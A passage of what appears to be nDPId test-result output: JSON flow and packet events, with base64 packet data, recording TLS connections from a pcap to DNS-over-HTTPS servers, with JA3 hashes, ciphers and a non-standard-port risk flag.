+00843{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":222,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":946739336955,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":338,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":338,"pkt_l4_len":304,"thread_ts_msec":946739336955,"pkt":"REREREREZmZmZmZmCABFAAFEM0dAAL0Go94KAAABuelq6LZCAbsgVVLXybMJllAYAfbmxAAAFgMBARcBAAETAwMcr1WdeadOHog3lEpiodEeAcm2gZJgU0L8O6YStA7tWSAYYApreqfeMV002xSAt2FZT+xN2PBaLBfkQPkpY2yRnAAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACkAAAAEwARAAAOZG5zLmRuc2hvbWUuZGUABQAFAQAAAAAACgAKAAgAHQAXABgAGQALAAIBAAANABoAGAgEBAMIBwgFCAYEAQUBBgEFAwYDAgECA\/8BAAEAABAADgAMAmgyCGh0dHAvMS4xABIAAAArAAkIAwQDAwMCAwEAMwAmACQAHQAgsGpq4zmMsA+1iGgtz9f+LYYNyHCIQZ\/zq3SyFDX6FwI="} 
+00908{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":222,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739336955,"flow_last_seen":946739336955,"flow_idle_time":7560000,"flow_min_l4_payload_len":284,"flow_max_l4_payload_len":284,"flow_tot_l4_payload_len":284,"flow_avg_l4_payload_len":284,"midstream":1,"thread_ts_msec":946739336955,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.233.106.232","src_port":46658,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.dnshome.de","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +04395{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":223,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":946739336992,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":2958,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":2958,"pkt_l4_len":2924,"thread_ts_msec":946739336992,"pkt":"ZmZmZmZmRERERERECABFAAuAvuxAADkGkf256WroCgAAAQG7tkLJswmWIFVT81AYAfXxAAAAFgMDAHoCAAB2AwOH51VjdKQ\/AZQoSOmoC7jYQ9n9NqAbTWqEvktHdZeP0yAYYApreqfeMV002xSAt2FZT+xN2PBaLBfkQPkpY2yRnBMCAAAuACsAAgMEADMAJAAdACBHlT\/ckNv1zu+YfSt\/zxC2rtSjIy\/UHNmUMGM8UGyVRxQDAwABARcDAwAgwilHvuszxY2P55AdC9vc0WNmaI98gk9UASFHh+rOkuIXAwMLGSaHw6LineCaEcA9j88fiSZ7p3jmYBOCmFwXmWuJbNVbDX18tcQr3ZATZwug3WdQUgZQuGPbLNtio7ePY9WJu1m+mcBvlmSf8p+kNIdmks3LygnPjDC2c6UxorLMoKdZpIF74n0UwdI1haIk7t9SxqKBNHhLqhVzXfA\/gYf10GXPi1hxhIDRS0KcW02uf1aHSSQNM4lfDYD4RpVTTVdscI7J3G592b5BxWNyVv0Whq0mJ6igzcGRSA9ve9GnhfQ7PQUMhLbnBs6Wh4\/E06aah5j\/y2NN9Rc5DR0mq07rU5Ce+\/XxD4lUU+ekKKMEv73SbncelyWJ8Y5vAOXrDEqq81ak\/UBhx9qx8\/JbLt7htRmRK4POVPXjov3f3C
r0\/J9vWUZrGJZBIzd1UHWlYZqWZ2e4zJnIzt4CgmUiyp0aneIGvtzNkXr50R32ENIRIAFyE695Wqs8jERpSPGsHn3huPrLifotNcrG9GhWfn+P06Pt7D4zUiFfvh+LyEBgC4g9mLo7FFTR9ZBh4cvU6KR2JbkcthJ2\/eit4GXyWKglPq9JYKNPyFUXXYoA+haf0kKxXZykljYvB6S+pRhq5fgW9P0TnapNy0IoETL\/FsgOgMCO0tJLa6wJ+moPbCUrnqhRlYqM1pTafI1RDq9YRk8QTG21gC3tmzmBSfh\/ZYdFQXZmYXvWfFwGRjyPIT9+zMlqq2Pdp2JskHpsbB\/FwB1MOL4EMGO2rEvqAN\/G+LUDaZwDQErYmrvokCqs5wzQjVzO+vQiri8OiX7KtSVymFdc3QbFXkOIAgL4ZCdwmcaz\/rCx33yioKUWWt5qTqCZ9pmtXhl4HcAp8XhgUIEYBgprpf\/Ti2fp0ElRAFLFXlwNoLI9iggooHHGhx21Tg5YhcbP60KH\/320Ma9w9iPFEDojm9a7Uksk9S+uRWv4OhUAAYKjuWZotkEozfx2xPJWhN+3nf+Iha6M\/PTSY3MMhm1WzIZxhGYM104LxfJgMU8G9gWojlgvjhJ9uq3S6TQd83u3bJfgu1uC+MqFUVxe5NSUl7ikQ0I2+aFOcROfwG1sC6mO3ReC1pSOUUz4gO3A9SSBBDyhLMPE7cirAIcpsT33LqFeeSDEu0N967vwR6xVh0M7jpo7PUXyGgThPlyiOpRF9s8WGXtAs8kIwGDjwgfzhZb+5Ica\/Es\/V\/Dcco2lqRgq\/dcAdyZM5sv0arfbaybN8N7gqsGjPTm+jzsbUO6EEvEXHs0ldZG8m8mE2GFXoShd8wgIhqj+fRxwQgiYi3jFhqxSX8HSBaQWBy4gUMLE10OhfyAXvg9pZiOtBVXbyXYhifDjhNa8C4V7nKfsRjcc+IPNLOUCpNnF7zVC\/0wEFNmAysEgZKbiQ7nvWTQEj\/4XkHTl7q+V1nyze+YBcVwnousw\/sC5PPMkFjNe\/rVKH6Nl21Xz4CEnFJQWyg9SJCs8VgXn5Gx1la2fl1eBBcFXXyYGSGvhO\/t81KOmn26l6yIAJ+49g5RwCWqzmcqOfJ3ZxKGRw+Q485Of16n26ALDBRuhLDlJPjC0rbaer7p0vcHW895cpbl01o6MkW2RA6neV7IiozPr9ltdIu27V3GvvBr7fVargxd2L+tYgyfTl9\/WILWXDEQZ1hdvd3QHM4PdFHFrVVzTGEggsJMhAt5dWLBf1xkH6HOVjXSYC7QWsq9x8ZMQQFScuqTVdGfJ7phQpuljGNTYHS3Fr6g3GHbNodTeleAa40XcWPRR1QvCNrU4+1mAEfui\/VF5yCnzl57O6v4AZaL+xkQS3bq5TgH0cEyHZIZPSXLjPO+kUoZirl9ExMfDKt7TaVQdS2YK2Ak\/Zeh3+0YL9HobNvrh9Kdgz2l9vzkzpGJFhtkFPLbfyoUqy9qVF5BYXMDsDNfzLRqQCkxTChoU3Oq5WC+NNoDfVEiV1uqKr4CPZT+MhJo3dMWH5rs\/NiqvW5Ts1TD9YHqyVEww4VuTJUEbvVoPl69h72o9XVtS7KLsKkPydjzTTKhHgn+fyRDhXnwLBWppDpzlYOaK5Bu7LUZ7jwPpDGb2uHb\/NdM6kLWzWHLfaWGXR9MiHxj02STxuaoJkhvcxJyZ4jf7EzDEtGtwrRtO9550RF2CTHt4JP2DLjHk039ZthYCTpxRqRekm7pNrIMm6JYaNTmH7DS2CnClfcodyWQo4n2PKz2RufAiyCR1Iovd48L90Pg2ksKOnBbJR09P4LdtuhxQLd8MMrL6a2NJAZcO+1X34ekx37pjBc0ECEHI\/F2EsMCaSmXvfpKvJDUd4hm6Lh+s4zDGKyYb0h4IN9C5WV\/0KBLeUKLuzHg0tLbCpWl5JAtrGio\/3uzgZW3lPesajgf
6\/6yAiqz5a5LojXhnEilNNECArJbZRC7dxSLQfHafj61RDK6iVUhWyQIyby8NmvYxyArKL23gG\/dtpUv9vzD5buro8NzKqBt4kyQq5AyRDl9Pdx90dbqzL\/wNfIMw2mirNqhLtAV3Lcmt\/A5VrjLx4ZixfonmUVwV7Oggr8cd2H76iCaLM2zov\/KSvGOLzKOj0+VfjyUlo5Hx0LkrFyR4dGU8OrY4\/30wah66XxEoGD44ZGGY9mmIzDkQJmAUZmkkS7CDbDg1Z8FYCE7np6+eulLdG560xvNnTNnZupEtGdS5efhEH8mvJ96YqbwwP7SeMnjliahQXu1+lakhVlu8+nICagunD7qLvS+Fg8H3c6rjbWQ5ju6044gUUjdx9m9ucGTb1DOdOSzatH4eu\/xj8ZAYSsVq\/DNz\/DBK6wsphchGHTe6SX3Win5Q9xfrgZYWPZHl0ArgB0ilWMiV\/ALLyorbVNLl9DHnMkx10GmbnCSrwAOigo8SWLMZlWe1j\/W9cK63Ok4pAEypI+tsaU4+KGNcg\/Y809pje8RhsRhZyPyRSO4W7\/HH8AmTmAipBXMFJFIlbGBgYuDxl\/k3WXdS2IEVB5uVrdrK3IuYdnPCCcVuL3hLwj6k9lhcwgEM27zriQrtCvCjvLyB8dJvyzZCywv3b9Z9hbJbpIZQI3lMz+XJWCtXR9B5wT2TiwcFkZLA8v\/Gj2OeLuTROa+JmAs1Cy1LT3LNHOmrtPT6ceYpz72COQRQio7ykebG+XDgiLiCvhnLtQVxEQCyclUf0DdNX7KRiUsNtpm9qhk\/7G3HsLQ++6h8v1DP0f5LGqLcix7u2oI33Cf4OwaMqtYGg3yPzbp5wNZ8XB9tSXKBPcsjkv4tUNMLMknHSDtW7RBZerB5euuv2oYXeLw6W1kFDZQwREcwkkkFkPaFTf2R0OaQ0s20yEJ+2MP7zAUxwADciRnXdaSacxi\/MFaNm0cuKFuTZ4y\/Y5UDPv5UQlN6az+4ZYU2R4xFvAktPXCaDzYwhyETBBXTQ3kCDrI2ulxdBfYOIiMYjZjYc8xv3tq1mBsJ+7sgbDu2gL\/fzU\/XzK9B7Kcn43ttHaGeIj+jaXeNq015DYfGa1PFCW5NxEG6gmnM2Xks2\/Rnpc+U3EocTaXUc80yTiNXgxgwYfe8v7xwjDD8vmvRwIAbeusZYjtv2\/kzAUu4e+OEPcd3Jl7OxogoNIIdrVgd4b6ak43cbXB0SXrSOX\/1U+4+a3+9h3qxiMRT+7taHA6EbLauuw0gFFTQLeevuvsRegZK"} +00950{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":223,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739336955,"flow_last_seen":946739336992,"flow_idle_time":7560000,"flow_min_l4_payload_len":284,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":3188,"flow_avg_l4_payload_len":1594,"midstream":1,"thread_ts_msec":946739336992,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.233.106.232","src_port":46658,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": 
{"version":"TLSv1.3","client_requested_server_name":"dns.dnshome.de","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01445{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":224,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":3,"flow_last_seen":946739336992,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":782,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":782,"pkt_l4_len":748,"thread_ts_msec":946739336992,"pkt":"ZmZmZmZmRERERERECABFAAMAvu5AADkGmnu56WroCgAAAQG7tkLJsxTuIFVT81AYAfUY7QAABNww0uNuIsxm8qmdOPnMYeMk326YaxrhZ4BeE0iQsCOXpRsiKt+zuMH\/p46kXln3RjaOovnK3lxdaHFHnp3StO0w+9qyP8dfRt45iKXPZFHyuSZwyZICfazc2HX7baqawWsKHZ5R1vywVP6AqZpQ8xcDAwIZV+38qSfJjoOS9nhUEl3M5HQzO5DKRWLOqxVrOGS63iBZfxHLzBoty2qy3aDDfnx2Xca0b33wH+vr40qRx9mkz2WtuJs2PYtZyC6YxK5JHe0kUVYNQ8e0DmF1+83AmxFepTqPZR2RfXf2xtUUMst9Opu0LUgXejoef7ambf+g9Hfx1wcIPED7otCGjweGJmU4YxhSCmvm\/0prJdQTwLXZC1W3mnq5JD37u0ZpUZMdfulvx59AlBuxI9dDcGROTozpsYCeE9oOe\/+Op0XuIETBK4vQLjS+LqRPSPWlSzl34Ie9Lj5RtzFBiCOGkmC7wa1QGFdc0GBzHqe9X2VH4rhHT\/IVDbq7gKOuuDcZFEQo8KQkkgT\/bghJzCpIQIarVLOPJxv7EiP8jhgdtK0VY7ia6u+987fqrobyPuMatQbDO9AYRrsJJ\/ihFxuvGwFO0eh7s9vftBi8t0DzNQTsnPfAcZ\/ZhEkLxw\/vJIZfSRisiciHHsUp4piy+90mTdN5MUCDY5ry7DKAw6vfyOQHg9r82wvKNjwJ+rcekPLEv\/FHRvy1AZ1HMnW6KZrjJNV8SoDwDvDT5+zsDiOQRZ1eS4AXXC0O32K6gqAACjcqP2miu29e\/oaEK6\/b1NO2Ve4\/XFw2LcUxmiYpmfORgcrg0e71Ts168PRZOrwhuw4jECElrQOXPiGerekKt0pjC\/PXBVUwNa02PEriryGUFwMDAEURcT9DfIBolrnsJBL883VWax5ssbCevOTqwONlZ29TVRgiw1ubDPfUhqNcVCvs6bW1xyVTdeWqdjyxvrhijbOm0mBmopM="} 
+00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":235,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739348407,"flow_last_seen":946739348407,"flow_idle_time":7560000,"flow_min_l4_payload_len":286,"flow_max_l4_payload_len":286,"flow_tot_l4_payload_len":286,"flow_avg_l4_payload_len":286,"midstream":1,"thread_ts_msec":946739348407,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":36012,"dst_port":453,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00846{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":235,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":946739348407,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":340,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":340,"pkt_l4_len":306,"thread_ts_msec":946739348407,"pkt":"REREREREZmZmZmZmCABFAAFGD1pAAL0GczUKAAABlTjkLYysAcV+b2P18dMOKVAYAfY7WwAAFgMBARkBAAEVAwN1j0zYbg0sj5M3182ApIbVPce07i2k0VciV63ZowCdCSAqVc02WrOXRNItgTWsiYtxSSngWuVjvyRNgTc9xl83+QAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACmAAAAFQATAAAQZG5zMi5kbnNjcnlwdC5jYQAFAAUBAAAAAAAKAAoACAAdABcAGAAZAAsAAgEAAA0AGgAYCAQEAwgHCAUIBgQBBQEGAQUDBgMCAQID\/wEAAQAAEAAOAAwCaDIIaHR0cC8xLjEAEgAAACsACQgDBAMDAwIDAQAzACYAJAAdACDGkG2e0e5ygLjqcZTIOnp7CQIXlvblqyaK24BObKyFNQ=="} 
+01048{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":235,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739348407,"flow_last_seen":946739348407,"flow_idle_time":7560000,"flow_min_l4_payload_len":286,"flow_max_l4_payload_len":286,"flow_tot_l4_payload_len":286,"flow_avg_l4_payload_len":286,"midstream":1,"thread_ts_msec":946739348407,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":36012,"dst_port":453,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns2.dnscrypt.ca","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+04666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":236,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":946739348519,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":3152,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":3152,"pkt_l4_len":3118,"thread_ts_msec":946739348519,"pkt":"ZmZmZmZmRERERERECABFAAxC6ChAADQGGGuVOOQtCgAAAQHFjKzx0w4pfm9lE1AYAfVGVwAAFgMDAHoCAAB2AwMRVjU7SKUNCImmvfttR+GlB5jHaN+TnBAPl2NNilPzIiAqVc02WrOXRNItgTWsiYtxSSngWuVjvyRNgTc9xl83+RMBAAAuACsAAgMEADMAJAAdACCw4eX0v0AF\/2ysIrFslRpf1BB8aJflBi+uBQjF\/mpUaxQDAwABARcDAwAgSKLdPzNvW2jgnkkt1ArGKeMX1pOVS05PtE3+\/eUokuAXAwMKE7xrj8Cd0gecm+XxCtcCbfqp0Xw17l8bEv\/shADxxxp2Bzbyoz5R49XobAcn0zX4NMbYWhifQlUUPNi0pizuvO4Z2uJ7BgjBOgi7uGW9+EclkcQWPWUejxuRe7O410Q5Df3K0lFnTAKG5Q8hFQzWRLGpFNFdEHr9f\/gxxabZC79EC8Yp0yPXv\/HmMDXkQ4MFiklGk+tPcmld0DJxvUQMzeQxCm86Y50216avc9vAu6fj0J+kYdXk7oWDmD2dtLnR5EwpZu8cRY2UbUkl8ALnrb07VMOoFJY7zPFJIjuPu6NJRBVNZJB3vE0d6+a5PM4g6gDBfk3e5g98tlFHWiMNmuoZFlZFFaCJemgWUBnumrnynKFU46wjegkqBdCTk4d+NWELHpY6VAZduP79nQdaN3tx1a2c01muRMXnx81+ULomH3\/REIZL8cJwn+2P90vZcz0nqHAdHNiNOVCuiRaWyF4Wvtc2sEcGUjXGdVCvWK5\/TAJXm0J2jHwKksw9UwwmgBH2L6bGrwRyHCJ2cw2hrKj3bjjl++Bt52RqDx0PVra\/rDo\/D9uT1POR1MaM\/x6LwSGCpAydntCKtia54FgA3Uhl\/nC30fr8SinEx99ZlxNZcUwMiSNiiKzXEm9FsWYC\/mMQzJV1i0LpOAR5NQqTWYZcgE0\/OveI8ff5IAowgJ+Hh\/4cxgYyfxncxnZuou7BNW6vK67qt4eHbNzMxkGd+MYfZPjpdNHgl0+9xwS+qPx5Geun7Q7WO597TYhUFRG65T4qW2mYIUwL1aivadFz0v3ufWodzPjitCdjrW\/CjxtgUeuQtpa9t6KowJyhDmylZ7M\/A\/0JA+G7fTgIe1TbG0xXzz8kDHjrceHEBB3fFYvU5PKsGoQIH7p5mVRtoWylDhNC8a99xzxvR321Mh05C\/rxybySPX5rS74BeJ3VVwh0u5wrKR0eaWETinu\/8G\/XeeDanjx9v3DJgHY+pmOJ6EfJAfykxOYeiP4203LV9khy85bpP5JKwpS2QMRmDFSBHdsHpJDRK\/DdvVbwNlWzfHpmLZWIHourYiO61Z3oUmy4jI6OPDHv5EeJ3GNgfdU2yVIDdXq\/feGnWjZ1ojjDmfZzX6Ga4usOS7QhUW\/qRlMWXjj0hWmVMuLgwxGhGIXFKHCnNkMvxhSfzVsE\/fi2RWPnsN8Y42mvONkcXcfz9fwVNPYZJ6vnJUdC38oFYuyxT6LU0tUbEwaY\/ADwFl01XGl4ZRLV0i0vW1o2ORCGan1S8ji0kjp1PF5SgkDs
zY7oyvcHWR2j4C6IQfUNuW9sz\/BQ14X4v9\/xe+MBb1f30kVxu3I5Z5sCgwSJyclzM\/f\/w7+dPBCbaDnko\/4n8h05Ca12TAlFGzHkKPnx1A7nHgTXQTbJZXVUHU1yc6wwHk03G82kbZx+9FOzA9UNN9spmOc1YFepJxRmeK9M4veJGaNpfRVGQg2bta2RYDoDQK6oksPTzxPlWmkrVyuPbKNRQte57AnTO0NVTFr+bzDGOQFV5KuQbIF5hun\/LyUUKo6IgZruMikB6RR4IQ2uwGAocW75mLZis5bpZE122ilxmqMjkobAkDhx94FariZ5KfD\/Dr73ksFu0dQOrbgEoWdEDM1QJlwefbcBwmDPAZLTV06HvqQLrQ3a1J+ItnjBF\/3OcuGO6PNfCT4mXVZw\/XCZX37Gyj2evv5QnGXPK1+Sz2Q5HIbp4HDap\/+BBCzFRfzqg0GnGl3jD7AOmoAQDjzGfNFmTCT3IVA+v7COJSJTgvupRfK8IGZ6AChkDUM1D7TO\/gBXEdODTbF1kgj7tfbZE7QwEaK830652BNyQJGc4RRNwEbSlnyim1OuU6TMP1kn575di9kDVNjDx2AGxl9r8\/Snh1yll75FKAvMdPXTtCkrIgF4ok5dKpFUBKte07uQ2NnmiDy8tXArJDdFY7b0nRfBceQeXxY+261VTVS3qQ8BgkT+EbOmZjAyNz47hC\/w2WDlet\/NE9emDu\/WKqWCIy3yA1831JCwRHJDtJVAd9ss2dknfVJUGkTZeyaziCfo\/hUPLXsYyHku+nVEJbqNRpQOhPnb2jeGQfmWpk2og0U8kSEHESILcSFehIwO8Vb02doDEPxmjiluOoiNj8DTjVwesJzOCze3nnZ5thxuSrDhczvTCxNeMi2LoAi6IHJwv6yKmP3cCkUEWe4z9AbWZf4hUxJmNVNy5Q7vVV994JHX8omBPWK038vtH5PW7a2OYFKIdjI2Yz6SzJZ+OqlYbYFCmqa0c1eGXVB\/8TqdStQuai1fU0TE\/mTy2FB8c7NSR\/VKsBC8I6sIjqPn9nPpsLX4Aa5DuM2tqeuJozI3MGtgrFFDrWyvjyt1h\/ISepVOPB\/T+JPzE5fwBCeACmNByH9IK2FVF9+wHSMnDH3Rdcgq4pgz6QU4cUluqyfpyzHlgAE9GfUnMqJiECiCuREVqACQxSZ7sa2wTa0di8dAGzoqN4wIPrx\/temySP8MWqmu\/laj2zLNnRd172onl\/m0hR+U8Hv2MACSDGStNO4O5BZwFSeic72yCVIqhVfsgHETqQg8hlMMT17c\/Uj9ao0O73iw5Wjk\/7cB+lK3LZb6byC2wyyD+pd3TtLmM3qgg8MtUgLGKfhsIhfUQTp\/XqEKFU5NCsHHu5VZEHHRdrJOXdW\/pdNLP05EW9nsN0M81ZPdlsv4so8uNoBrTLmnVUIf8Xa\/+SxfhPXt5a7K9AzUWWAjnEVKewBClu712Lm3rXDDG8akrRqhMVator6IljVQJj5vEGH7cBag89maUZ4A+3FglL2gnFPZqquwNwRZ\/3ZI\/mK3YEJZaZg1I0ttRdpLCWXjXUB\/Ipx3mzzk088GloS95doYpwADCEaNRAt8ezUks5kQLYjOijiV4kNTL4MxFeNVH8TtI\/eKEzXoMQeONGsl0ElE1PvGiv8WDRmkmPVWFKUutMd8AsdJvQyoKp4+YBesIZnfv5oqwoZYzY6xW0eyUs26A2QPqxn4XpA6GW55Ed1urfGB\/LM4y6m1PQnCV91nOX\/rijw0hyc632Jc4nJK2Fy84ObW9S4LluL+dKVbnJwm07LENwwbm524\/mub+gizMq1y+sluBrCe\/URmcV1qijGxp4HTb+RHA1oHAF\/FwkQx5VCNkGEMN0VqUf0AhXzQ7n792nY1bKlqBB5bwOJqseO8f5u7xOkvAJgvo15UUiFg3Fs2KF6ThIQ+YMon+lnrc8ic+qxARfjEb0
cUl2zxPZdn9Pk3JDZvc3FGGanhfOsuSbbIvGq9hrnu1dWnHdMIQG0tNqt5ibv87oqeA73DYcjrRkRvnmr+NgiyzjsYvnZnavg2SVhWLOyeYi6z6452amFOWjGib+uO3a6rOPS\/dTZTQ6OPLUcWKxkXHJYeC+Yo0LWKJwuFiHg7pi2FgUOZ1c24VzSrIDORj9fOesNSZQSAFwMDARkW8VkjAKLO1iVO3Z32JB1I03p1Xf19NsjcozTvJTA7tEC3r\/iX403MlEBRFX3aGlXo2cYSoUTLuYUpZWzaPV43zoko1HlYoj3YCwOBNXEdg1n9iG9nfj9q6\/IWDsPyy9SboWjcQJVD0zE5qJ8DwGucAIvsQ7D0zCtLvnxWjjpqSDdb9tOBYDpaZBZU8KCwR8LHjkKDpJkQyCpohil6861j3biEmWgZIX0h067Jmu+\/GI2jSqgEcF0VdDgb777Odt1jnDUv6rPpys\/KpOKpGwd1sOOD1atUuwZ2VWxJpoQFOVZofLGtGDAGLonrwSCzj9\/ObIFITDrXAwr6TE8\/SO2citlABmWDWJNFMQq1IU16fmzPW9wZ2jhYPxcDAwA1KFs5Si96rO1Ec9S06xPPSvxONjZOZ1eDJyi5V7B3adcTvi5GDWF42J9ne7Y2tNbnJdDWBMM="} +01090{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":236,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739348407,"flow_last_seen":946739348519,"flow_idle_time":7560000,"flow_min_l4_payload_len":286,"flow_max_l4_payload_len":3098,"flow_tot_l4_payload_len":3384,"flow_avg_l4_payload_len":1692,"midstream":1,"thread_ts_msec":946739348519,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":36012,"dst_port":453,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"dns2.dnscrypt.ca","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+00547{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":237,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":946739348521,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":118,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":118,"pkt_l4_len":84,"thread_ts_msec":946739348521,"pkt":"REREREREZmZmZmZmCABFAABoD1xAAL0GdBEKAAABlTjkLYysAcV+b2UT8dMaQ1AYAfU6fQAAFAMDAAEBFwMDADViidEmWrIRj1bupCYNTHJ+IR+sbSf6KT90A8qW52RQBURyQL9vFT6E9CFjlI93BJu2cr+zKg=="} +00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":252,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739348961,"flow_last_seen":946739348961,"flow_idle_time":7560000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":288,"flow_tot_l4_payload_len":288,"flow_avg_l4_payload_len":288,"midstream":1,"thread_ts_msec":946739348961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.153.187.96","src_port":38018,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00852{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":252,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":946739348961,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"thread_ts_msec":946739348961,"pkt":"REREREREZmZmZmZmCABFAAFIPztAAL0G074KAAABLZm7YJSCAbsJfFJ\/n27j2lAYAfaq8AAAFgMBARsBAAEXAwMZV\/YJsl1KDGHp6vinUuSzBgwYUj7HikeN2yT\/6PXJXSCCG8AdBIamvVFUtiPCGd7atl\/XGLRDF4fN5wiY+j2o\/gAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACoAAAAFwAVAAASZG5zc2UuYWxla2JlcmcubmV0AAUABQEAAAAAAAoACgAIAB0AFwAYABkACwACAQAADQAaABgIBAQDCAcIBQgGBAEFAQYBBQMGAwIBAgP\/AQABAAAQAA4ADAJoMghodHRwLzEuMQASAAAAKwAJCAMEAwMDAgMBADMAJgAkAB0AILqIx\/2aPwjQ+1CtVREnVkbTOyfaXxjQI4MYF1wNoZlj"} 